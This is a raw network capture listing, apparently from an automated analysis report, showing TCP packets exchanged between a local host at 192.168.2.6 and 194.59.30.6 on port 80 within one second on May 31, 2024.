May 31, 2024 08:09:36.165539026 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165555000 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165551901 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165565968 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165575981 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165585995 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165597916 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165607929 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165613890 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165613890 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165620089 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165632010 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165638924 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165661097 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165678978 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.166750908 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166784048 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166838884 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166840076 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.166851997 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166874886 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166901112 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166906118 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.166910887 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166927099 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.166953087 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.166960001 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166970968 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166980028 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.166991949 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.167018890 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.167047024 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.168307066 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168375969 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168385983 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168404102 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168418884 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168430090 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168431997 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.168459892 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.168515921 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.168895960 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.168951988 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.168977976 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.169028997 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.169054031 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.169085026 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.169109106 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.169133902 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.244680882 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.244754076 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.244770050 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.244810104 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.244857073 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.244887114 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.244916916 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.244937897 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.244957924 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245003939 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245038986 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245062113 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245090961 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245121002 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245141029 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245167971 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245199919 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245220900 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245254040 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245273113 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245306969 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245328903 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245364904 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245524883 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245579958 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245599031 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245623112 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245666981 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245699883 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245738983 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245738983 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245778084 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245810032 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245831966 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245851040 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.245879889 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245914936 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.245965004 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.246320963 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.246356010 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.246387959 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.246409893 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.246474981 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254298925 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254331112 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254365921 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254390001 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254410028 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254456043 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254487991 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254508972 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254539013 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254560947 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254595041 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254651070 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254774094 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254806995 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254827023 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254848003 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254884005 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254916906 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.254935980 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254962921 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.254987001 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255017996 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255040884 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255068064 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255091906 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255127907 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255148888 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255171061 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255417109 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255475998 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255526066 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255558014 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255594969 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255594969 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.255639076 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.255686998 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.260751009 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.260807991 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.260826111 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.260859013 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.260883093 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.260909081 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.260931969 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.260967016 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.260997057 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.261015892 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331413984 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331451893 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331500053 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331525087 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331561089 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331583023 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331631899 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331654072 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331676006 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331706047 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331737995 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331759930 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331782103 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331811905 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331840038 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331876993 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331897020 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.331943989 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.331975937 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.332010031 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.332030058 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.332055092 CEST  51544  80     192.168.2.6  194.59.30.6
                              May 31, 2024 08:09:36.332079887 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332113028 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332142115 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332159042 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332272053 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332323074 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332380056 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332411051 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332429886 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332461119 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332525015 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332539082 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332577944 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332592010 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332623005 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332643986 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332667112 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.332695961 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332729101 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.332779884 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333201885 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333252907 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333276987 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333308935 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333340883 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333360910 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333388090 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333421946 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333456039 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.333478928 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.333501101 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339143991 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339200020 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339231968 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339251995 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339272022 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339323997 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339340925 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339374065 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339396000 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339426041 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339451075 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339482069 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339509964 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339531898 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339555979 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339720011 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339752913 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339778900 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339798927 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339827061 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339874983 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.339895964 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339945078 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.339978933 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340013981 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340043068 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340081930 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340115070 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340150118 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340186119 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340215921 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340238094 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340270042 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340305090 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340325117 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340524912 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340574026 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340609074 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340656996 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340717077 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340774059 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340789080 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340835094 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340856075 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340893030 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340919971 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340951920 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.340972900 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.340991974 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341021061 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341065884 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341089010 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341115952 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341141939 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341173887 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341209888 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341229916 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341257095 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341283083 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341414928 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341754913 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341789961 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341825008 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341864109 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341891050 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341921091 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.341941118 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341960907 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.341990948 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.342029095 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.342036009 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.342066050 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.342088938 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.342123032 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418164968 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418216944 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418279886 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418279886 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418359041 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418395042 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418418884 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418459892 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418488026 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418507099 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418555975 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418612003 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418626070 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418657064 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418678045 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418703079 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418729067 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418762922 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418812990 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418836117 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418886900 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418915033 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.418943882 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.418963909 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419003963 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419038057 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419059038 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419075966 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419104099 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419146061 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419168949 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419198990 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419222116 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419239998 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419270039 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419301033 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419322014 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419351101 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419373989 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419405937 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419440031 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419457912 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419477940 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419508934 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419532061 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419552088 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419580936 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419612885 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419635057 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419675112 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419691086 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419718981 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419760942 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419807911 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419861078 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419878006 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419909954 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419930935 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.419954062 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.419986963 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420006037 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420027971 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420056105 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420087099 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420125008 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420145035 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420176983 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420208931 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420242071 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420263052 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420293093 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420321941 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420341015 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420366049 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420397997 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420419931 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420447111 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420473099 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420525074 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420608997 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420660973 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420711994 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420730114 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420762062 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420794010 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420815945 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420838118 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.420867920 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.420917034 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.425717115 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.425746918 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:36.425782919 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:36.425782919 CEST5154480192.168.2.6194.59.30.6
